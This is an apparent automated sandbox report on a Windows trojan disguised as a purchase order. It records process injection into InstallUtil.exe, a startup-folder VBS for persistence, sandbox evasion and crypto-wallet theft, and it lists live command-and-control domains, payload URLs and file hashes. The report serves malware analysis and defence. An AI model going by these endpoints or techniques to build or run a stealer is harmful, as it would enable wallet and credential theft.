                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 462000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 6FA008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 76EFA6F0Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 460000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 462000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: CA5008Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002D9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]q$
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002E11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]q\5
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerh{]qT
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager*
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]q
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002D04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]qtr
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeQueries volume information: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeQueries volume information: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet@\]q com.liberty.jaxx
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q1C:\Users\user\AppData\Roaming\Ethereum\keystore
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2163407938.0000000006430000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                  Source: Yara matchFile source: 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5008, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5488, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		Valid Accounts321
                  Windows Management Instrumentation                  		111
                  Scripting                  		212
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping621
                  Security Software Discovery                  		Remote Services1
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Registry Run Keys / Startup Folder                  		2
                  Registry Run Keys / Startup Folder                  		1
                  Disable or Modify Tools                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		341
                  Virtualization/Sandbox Evasion                  		Security Account Manager341
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook212
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeylogging113
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials213
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586913 Sample: PO-12202432_ACD_Group.pif.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 29 pureeratee.duckdns.org 2->29 31 www.chirreeirl.com 2->31 33 chirreeirl.com 2->33 55 Suricata IDS alerts for network traffic 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 Multi AV Scanner detection for submitted file 2->59 63 6 other signatures 2->63 8 PO-12202432_ACD_Group.pif.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 61 Uses dynamic DNS services 29->61 process4 dnsIp5 35 chirreeirl.com 209.58.149.225, 443, 49704, 49712 LEASEWEB-USA-DAL-10US United States 8->35 23 C:\Users\user\...\IsNestedFamANDAssem.exe, PE32 8->23 dropped 25 C:\Users\user\...\IsNestedFamANDAssem.vbs, ASCII 8->25 dropped 27 IsNestedFamANDAssem.exe:Zone.Identifier, ASCII 8->27 dropped 65 Found many strings related to Crypto-Wallets (likely being stolen) 8->65 67 Drops VBS files to the startup folder 8->67 69 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->69 73 2 other signatures 8->73 15 InstallUtil.exe 2 8->15         started        71 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->71 19 IsNestedFamANDAssem.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 37 pureeratee.duckdns.org 193.187.91.218, 49710, 50787 OBE-EUROPEObenetworkEuropeSE Sweden 15->37 39 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 15->39 41 Found many strings related to Crypto-Wallets (likely being stolen) 15->41 43 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 15->43 51 3 other signatures 15->51 45 Antivirus detection for dropped file 19->45 47 Multi AV Scanner detection for dropped file 19->47 49 Machine Learning detection for dropped file 19->49 53 2 other signatures 19->53 21 InstallUtil.exe 3 19->21         started        signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  PO-12202432_ACD_Group.pif.exe68%ReversingLabsWin32.Trojan.Leonem
                  PO-12202432_ACD_Group.pif.exe100%AviraHEUR/AGEN.1308638
                  PO-12202432_ACD_Group.pif.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe100%AviraHEUR/AGEN.1308638
                  C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe68%ReversingLabsWin32.Trojan.Leonem

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp40%Avira URL Cloudsafe
                  https://www.chirreeirl.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  pureeratee.duckdns.org
                  		193.187.91.218
                  		truetrue
                    		unknown
                    chirreeirl.com
                    		209.58.149.225
                    		truefalse
                      		unknown
                      www.chirreeirl.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp4false
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netiPO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/23354PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJPO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpfalse
                              		high
                              https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dllInstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/2152978/23354rCannotInstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/11564914/23354;PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://stackoverflow.com/q/2152978/23354PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exeInstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exeInstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/mgravell/protobuf-netPO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpfalse
                                            		high
                                            https://www.chirreeirl.comPO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.00000000030D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.00000000030D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              209.58.149.225
                                              		chirreeirl.comUnited States
                                              		394380LEASEWEB-USA-DAL-10USfalse
                                              193.187.91.218
                                              		pureeratee.duckdns.orgSweden
                                              		197595OBE-EUROPEObenetworkEuropeSEtrue

                                              General Information

                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1586913
                                              Start date and time:2025-01-09 18:56:05 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 41s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:PO-12202432_ACD_Group.pif.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winEXE@8/4@2/2
                                              EGA Information:
                                              • Successful, ratio: 50%
                                              HCA Information:
                                              • Successful, ratio: 88%
                                              • Number of executed functions: 399
                                              • Number of non-executed functions: 34
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45, 172.202.163.200
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target InstallUtil.exe, PID 5008 because it is empty
                                              • Execution Graph export aborted for target InstallUtil.exe, PID 5488 because it is empty
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: PO-12202432_ACD_Group.pif.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              12:56:51API Interceptor24x Sleep call for process: PO-12202432_ACD_Group.pif.exe modified
                                              12:57:12API Interceptor11467310x Sleep call for process: InstallUtil.exe modified
                                              12:57:14API Interceptor20x Sleep call for process: IsNestedFamANDAssem.exe modified
                                              18:57:05AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              209.58.149.225RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                  https://contract-kitchensbywoodys16713653.brizy.site/Get hashmaliciousUnknownBrowse
                                                    193.187.91.218RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                      RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        pureeratee.duckdns.orgRFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 193.187.91.218
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 193.187.91.218

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        LEASEWEB-USA-DAL-10UShttps://ccml.io/Get hashmaliciousUnknownBrowse
                                                        • 172.241.26.5
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 209.58.149.225
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 209.58.149.225
                                                        xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 172.241.229.61
                                                        Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                        • 209.58.145.210
                                                        JHPvqMzKbz.exeGet hashmaliciousVidarBrowse
                                                        • 172.241.51.69
                                                        arm7.elfGet hashmaliciousUnknownBrowse
                                                        • 172.241.27.111
                                                        https://bitfinexinvestment.com/Get hashmaliciousUnknownBrowse
                                                        • 209.58.153.106
                                                        http://www.web3walletsync.com/Get hashmaliciousUnknownBrowse
                                                        • 209.58.146.114
                                                        https://click.dn.askhelp247.com/?qs=56daa84a9aeab310141fd7b3abd36125b539fd4f3799231d7ea795f5ca63ee3d16f8d954cbf1ffa46296eb2ff8fe4db6c125eafbd8e358283667a34a51f183eeGet hashmaliciousUnknownBrowse
                                                        • 172.241.26.5
                                                        OBE-EUROPEObenetworkEuropeSEG6hxXf90i5.exeGet hashmaliciousUnknownBrowse
                                                        • 185.157.162.103
                                                        G6hxXf90i5.exeGet hashmaliciousUnknownBrowse
                                                        • 185.157.162.103
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                                                        • 185.157.162.216
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 193.187.91.218
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 193.187.91.218
                                                        ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                                                        • 185.157.162.216
                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                        • 185.157.162.216
                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                        • 185.157.162.216
                                                        file.exeGet hashmaliciousXmrigBrowse
                                                        • 185.157.162.216
                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                        • 185.157.162.216

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eNuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 209.58.149.225
                                                        Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 209.58.149.225
                                                        http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                        • 209.58.149.225
                                                        JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                        • 209.58.149.225
                                                        bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                        • 209.58.149.225
                                                        s7.mp4.htaGet hashmaliciousLummaCBrowse
                                                        • 209.58.149.225
                                                        chrtrome22.exeGet hashmaliciousXmrigBrowse
                                                        • 209.58.149.225
                                                        5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                        • 209.58.149.225
                                                        PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                        • 209.58.149.225

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1183
                                                        Entropy (8bit):5.349889760691853
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzetfE4KnKIE4oKNzKo9E4KhM:MxHKlYHKh3oRAHKzetfHKntHo6lHKG
                                                        MD5:91323CD5C720493F291A5308AF630221
                                                        SHA1:1F94B2F25F7CE942EA6289E8B74295F4689F8A1B
                                                        SHA-256:8EB1993F0CE22F0757AA4E5DB1CF6173C44EBE5CA272CEDFC141961E0A63DE1A
                                                        SHA-512:46858065C5A8BE1BDB19AE7E6A03E6853F65F4F958291733AF36D2C5208072AD5E5EE0C28080FC5D462551445B69BF7D4D5B1E50857FF7E5D7BF36FEABB54E98
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=n

                                                        C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):27136
                                                        Entropy (8bit):5.516192210902329
                                                        Encrypted:false
                                                        SSDEEP:384:RTo2ZKanPS/jKkWS+72x+oVQ4ZHiYzfmP4a0fIMbRodF5YHqZlEOmWVYvZ:omsz+72x+qQUicfFfdE0AiB
                                                        MD5:95BEC6594E293A42F4ABB049EA7E81DB
                                                        SHA1:36ECE8150F0619FC81BBF92BD840CAD252BF1AEA
                                                        SHA-256:43057C1F8E32C29342CFB790C692C291F33526F9BE1380758B9C7C42344A5948
                                                        SHA-512:51989412F10AA223E52190587EBF20D0EF447C96D75B9C1D6592DB9C1814D9F56C213CF4B2AD1543D5FC5F20A775D0DB55820D5725A88EF983C454020E6A68C4
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 68%
                                                        Reputation:low
